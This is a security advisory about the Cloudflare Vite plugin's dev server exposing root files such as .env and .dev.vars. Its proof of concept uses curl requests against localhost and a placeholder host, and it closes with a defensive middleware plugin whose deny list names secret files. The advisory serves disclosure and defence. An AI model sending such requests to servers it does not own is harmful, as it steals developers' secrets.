Summary
Note: originally posted on H1 but closed. Cross-posting over to here in an abundance of caution instead of a public issue.
When utilising the Cloudflare Vite plugin in its default configuration, all files are exposed by the local dev server, including files in the root directory that contain secret information such as:
- `.env`
- `.dev.vars`
PoC
- Create a Workers project that utilises the `@cloudflare/vite-plugin`. For example: `npm create cloudflare@latest`
  - select Framework Starter -> React
- Add any secret files to test if they're accessible. `echo foobar=secret > .dev.vars`, for example
- Run `npm run dev` to start the dev server (after running `npm ci` if necessary to install dependencies) and then hit the following to expose information:
  - `curl http://localhost:5173/.env` may expose any secrets in this file
  - `curl http://localhost:5173/.dev.vars` may expose any secrets in this file
  - `curl http://localhost:5173/package.json` may expose dependencies used by the project, potentially leading to other vulnerabilities
  - `curl http://localhost:5173/README.md` may expose internal documentation
Impact
If the vite dev server is exposed on a public network, such as when a user simply uses `wrangler` to serve their application and doesn't publish to Cloudflare in production, an attacker may be able to acquire secrets that the user doesn't wish to be exposed.
Another common scenario where this could happen is when sharing previews of an application using `cloudflared`: `npm run dev` -> share preview with `cloudflared` -> now all secrets are exposed to the public internet.
Exposing via vite is possible via: `npm run dev -- -- --host 0.0.0.0`
The default configuration has no reason to expose information outside of the configured assets directory.
Example:
- `curl http://somehost/.env` may expose secrets
- `curl http://somehost/.dev.vars` may expose secrets
- `curl http://somehost/package.json` may expose dependencies used by the project, potentially leading to other vulnerabilities
- `curl http://somehost/README.md` may expose internal documentation
- etc.
Information disclosure to anyone on the same network, or if the dev server is exposed such as via `cloudflared`, as explored here: #3455 (comment)
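As an added defensive example (not code from the advisory or from `@cloudflare/vite-plugin`), the following Vite plugin refuses to serve dotfiles and the named root files from the dev server, also catching percent-encoded and `..`-traversal variants of those paths. The deny list is an assumption built from the files named above; extend it for your own project.

```javascript
// Root files that must never be served by the dev server.
// Assumed list based on the files the advisory names; extend as needed.
const DENIED_FILES = new Set([
  ".env", ".dev.vars", "package.json", "package-lock.json", "README.md",
]);

// Normalise a request URL into a clean slash-separated path so that
// query strings, %-encoding and ".." segments cannot bypass the check.
// Returns null for a malformed escape sequence (caller treats as blocked).
function normalizeRequestPath(url) {
  let p = url.split(/[?#]/)[0];
  try { p = decodeURIComponent(p); } catch { return null; }
  const out = [];
  for (const seg of p.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") { out.pop(); continue; }
    out.push(seg);
  }
  return "/" + out.join("/");
}

function isBlockedPath(url) {
  const p = normalizeRequestPath(url);
  if (p === null) return true;
  const segments = p.split("/").filter(Boolean);
  // Any dotfile or dot-directory anywhere in the path (.env, .dev.vars, .git/...).
  // Relax this if you intentionally serve a dot-directory such as .well-known.
  if (segments.some((s) => s.startsWith("."))) return true;
  // Known sensitive project files at the repository root.
  return segments.length === 1 && DENIED_FILES.has(segments[0]);
}

// Vite plugin object. Middleware registered in configureServer runs before
// Vite's own static/transform middleware, so blocked paths get a 403 here.
const denySecretsPlugin = {
  name: "deny-secret-files",
  configureServer(server) {
    server.middlewares.use((req, res, next) => {
      if (isBlockedPath(req.url || "/")) {
        res.statusCode = 403;
        res.end("Forbidden");
        return;
      }
      next();
    });
  },
};
```

Add it to the `plugins` array in `vite.config.ts` (`export default { plugins: [denySecretsPlugin, /* other plugins */] }`); the built-in `server.fs.deny` list is a separate, complementary control.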